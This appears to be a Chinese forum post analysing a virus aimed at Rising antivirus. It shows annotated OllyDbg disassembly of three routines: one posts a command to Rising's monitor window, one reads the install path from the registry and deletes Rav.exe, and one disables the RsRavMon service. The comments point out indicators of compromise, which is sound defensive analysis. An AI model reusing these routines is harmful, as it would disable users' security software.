(-_-!)对付瑞星的病毒

 
1
 
; ---------------------------------------------------------------------------
; Routine at 00401890 (OllyDbg listing, x86 stdcall Win32 calls, no arguments).
; Purpose: locate a top-level window titled "监控中心" (presumably Rising's
; monitor-center window, given the page context) and, if that window has an
; owner, post WM_COMMAND (0x111) with wParam 0x9C5B to the owner.
; Returns: eax = 0 when the window or its owner is not found (both early
;          `ret` paths fall through a jnz, so eax is still the NULL handle);
;          eax = 1 after PostMessageA, whose own result is never checked.
; Clobbers: eax only (stdcall callees clean their arguments).
; Defender notes: the literal title string at 004072C8 and the command id
; 0x9C5B are usable IoCs for this sample; what command 0x9C5B maps to in the
; owner window is not shown here, so do not assume its effect without testing.
; ---------------------------------------------------------------------------
00401890   /$   68 C8724000    push     004072C8                          ; /Title = "监控中心"
00401895   |.   6A 00          push     0                                 ; |Class = 0
00401897   |.   FF15 50614000 call     dword ptr ds:[<&USER32.FindWindo>; \FindWindowA
0040189D   |.   85C0           test     eax, eax
0040189F   |.   75 01          jnz      short 004018A2
; FindWindowA returned NULL: give up, eax == 0 is the return value.
004018A1   |.   C3             ret
; GetWindow(hWnd, GW_OWNER): the message goes to the owner, not to the
; window that was matched by title.
004018A2   |>   6A 04          push     4                                 ; /Relation = GW_OWNER
004018A4   |.   50             push     eax                               ; |hWnd
004018A5   |.   FF15 54614000 call     dword ptr ds:[<&USER32.GetWindow>; \GetWindow
004018AB   |.   85C0           test     eax, eax
004018AD   |.   75 01          jnz      short 004018B0
; No owner window: return 0.
004018AF   |.   C3             ret
; PostMessageA(hOwner, WM_COMMAND, 0x9C5B, 0) -- asynchronous, result ignored.
004018B0   |>   6A 00          push     0                                 ; /lParam = 0
004018B2   |.   68 5B9C0000    push     9C5B                              ; |wParam = 9C5B
004018B7   |.   68 11010000    push     111                               ; |Message = WM_COMMAND
004018BC   |.   50             push     eax                               ; |hWnd
004018BD   |.   FF15 58614000 call     dword ptr ds:[<&USER32.PostMessa>; \PostMessageA
; Unconditional success indication regardless of PostMessageA's result.
004018C3   |.   B8 01000000    mov      eax, 1
004018C8   \.   C3             ret
 
2
 
; ---------------------------------------------------------------------------
; Fragment at 004010A7 (entered mid-function; the instructions that set eax
; before the first push, and the function's prologue, are not in this listing).
; Purpose: read HKLM\SOFTWARE\rising\Rav\installpath into a stack buffer,
; append "\Rav.exe" and call DeleteFileA on the result.
; Defender notes: the registry path, the value name "installpath" and the
; file suffix "\Rav.exe" are all literal IoCs; a registry read of that key
; followed by a DeleteFile on the assembled path is the detectable sequence.
; Stack layout inferred from the lea/mov offsets (not declared anywhere here):
;   [esp+0]  presumably the hKey slot whose address is pushed as pHandle
;   [esp+4]  cbData  (set to 0x64 = 100 below)
;   [esp+8]  data buffer for the installpath string (size not shown)
; ---------------------------------------------------------------------------
004010A7   |.   50             push     eax                          ; /pHandle
004010A8   |.   6A 01          push     1                            ; |Access = KEY_QUERY_VALUE
004010AA   |.   6A 00          push     0                            ; |Reserved = 0
004010AC   |.   68 7C704000    push     0040707C                     ; |Subkey = "SOFTWARE\rising\Rav"
004010B1   |.   68 02000080    push     80000002                     ; |hKey = HKEY_LOCAL_MACHINE
004010B6   |.   FF15 14604000 call     dword ptr ds:[<&ADVAPI32.Re>; \RegOpenKeyExA
004010BC   |.   85C0           test     eax, eax
; Non-zero (open failed) branches to 0040110C, outside this listing.
004010BE   |.   75 4C          jnz      short 0040110C
; Here eax == 0 (ERROR_SUCCESS), so the two `push eax` below pass NULL for
; lpType and lpReserved rather than a real pointer.
004010C0   |.   8D4C24 04      lea      ecx, dword ptr ss:[esp+4]
004010C4   |.   8D5424 08      lea      edx, dword ptr ss:[esp+8]
004010C8   |.   51             push     ecx                          ; /pBufSize
004010C9   |.   52             push     edx                          ; |Buffer
004010CA   |.   50             push     eax                          ; |pValueType
004010CB   |.   50             push     eax                          ; |Reserved
; After four pushes, [esp+10] is the original [esp+0]: the opened hKey.
004010CC   |.   8B4424 10      mov      eax, dword ptr ss:[esp+10]   ; |
004010D0   |.   68 70704000    push     00407070                     ; |ValueName = "installpath"
004010D5   |.   50             push     eax                          ; |hKey
; After six pushes, [esp+1C] is the original [esp+4]: cbData = 0x64 bytes.
004010D6   |.   C74424 1C 640>mov      dword ptr ss:[esp+1C], 64    ; |
004010DE   |.   FF15 18604000 call     dword ptr ds:[<&ADVAPI32.Re>; \RegQueryValueExA
; RegQueryValueExA's return value is not checked: the buffer is used as a
; string even if the value was missing, truncated, or not a string type.
004010E4   |.   8D4C24 08      lea      ecx, dword ptr ss:[esp+8]
004010E8   |.   68 64704000    push     00407064                     ;   ASCII "\Rav.exe"
004010ED   |.   51             push     ecx
; call 00402150(buffer, "\Rav.exe") -- cdecl (caller pops 8 bytes); presumably
; a strcat-style append, body not shown. No length check precedes it, so a
; value close to the 100-byte limit would write past the buffer -- TODO confirm
; against the real buffer size once the prologue is available.
004010EE   |.   E8 5D100000    call     00402150
004010F3   |.   83C4 08        add      esp, 8
004010F6   |.   8D5424 08      lea      edx, dword ptr ss:[esp+8]
; DeleteFileA(installpath + "\Rav.exe"); the fragment ends before its result
; is handled.
004010FA   |.   52             push     edx                          ; /FileName
004010FB   |.   FF15 A8604000 call     dword ptr ds:[<&KERNEL32.De>; \DeleteFileA
 
3
 
; ---------------------------------------------------------------------------
; Fragment at 00401302 (entered mid-function; the OpenSCManager call, the
; dwDesiredAccess push for OpenServiceA, and the pushes that saved esi/edi are
; not in this listing). edi is presumably the SCM handle: it is the argument
; to both CloseServiceHandle calls below; esi receives the service handle.
; Purpose: open the "RsRavMon" service and set its start type to
; SERVICE_DISABLED, leaving every other configuration field unchanged.
; Defender notes: the service name is a literal IoC, and a start-type change
; to disabled on it is what a Service Control Manager "start type changed"
; event (System log, event 7040) would record; ChangeServiceConfigA's result
; is never checked by the visible code.
; ---------------------------------------------------------------------------
00401302   |.   68 04724000    push     00407204            ;   ASCII "RsRavMon"
00401307   |.   57             push     edi
00401308   |.   FF15 04604000 call     dword ptr ds:[<&AD>;   ADVAPI32.OpenServiceA
0040130E   |.   8BF0           mov      esi, eax
00401310   |.   85F6           test     esi, esi
00401312   |.   75 0C          jnz      short 00401320
; OpenServiceA failed: close the SCM handle, restore edi/esi, return 0.
00401314   |.   57             push     edi
00401315   |.   FF15 08604000 call     dword ptr ds:[<&AD>;   ADVAPI32.CloseServiceHandle
0040131B   |.   5F             pop      edi
0040131C   |.   33C0           xor      eax, eax
0040131E   |.   5E             pop      esi
0040131F   |.   C3             ret
; ChangeServiceConfigA(hService, SERVICE_NO_CHANGE, SERVICE_DISABLED,
;   SERVICE_NO_CHANGE, NULL x7). The -1 pushed as ServiceType is 0xFFFFFFFF =
; SERVICE_NO_CHANGE; OllyDbg's flag decomposition on the wrapped comment below
; is just that bit pattern spelled out, not a real type combination.
00401320   |>   6A 00          push     0                   ; /DisplayName = NULL
00401322   |.   6A 00          push     0                   ; |Password = NULL
00401324   |.   6A 00          push     0                   ; |ServiceStartName = NULL
00401326   |.   6A 00          push     0                   ; |pDependencies = NULL
00401328   |.   6A 00          push     0                   ; |pTagId = NULL
0040132A   |.   6A 00          push     0                   ; |LoadOrderGroup = NULL
0040132C   |.   6A 00          push     0                   ; |BinaryPathName = NULL
0040132E   |.   6A FF          push     -1                  ; |ErrorControl = SERVICE_NO_CHANGE
00401330   |.   6A 04          push     4                   ; |StartType = SERVICE_DISABLED
00401332   |.   6A FF          push     -1                  ; |ServiceType =
SERVICE_KERNEL_DRIVER|SERVICE_FILE_SYSTEM_DRIVER|SERVICE_ADAPTER|SERVICE_RECOGNIZER_DRIVER|SERVIC
E_WIN32_OWN_PROCESS|SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS|FFFFFEC0
00401334   |.   56             push     esi                 ; |hService
00401335   |.   FF15 0C604000 call     dword ptr ds:[<&AD>; \ChangeServiceConfigA
; No test of eax here: success or failure of the config change is ignored.
; CloseServiceHandle(hSCM) via an indirect call through edi (the import
; pointer overwrites edi after it was pushed as the argument). The service
; handle in esi is not closed within the visible lines.
0040133B   |.   57             push     edi
0040133C   |.   8B3D 08604000 mov      edi, dword ptr ds:>;   ADVAPI32.CloseServiceHandle
00401342   |.   FFD7           call     edi                 ;   <&ADVAPI32.CloseServiceHandle>
 
哈哈``找窗口、注册表搜索路径、修改服务启动类型都用上了```
 
真的是树大招风
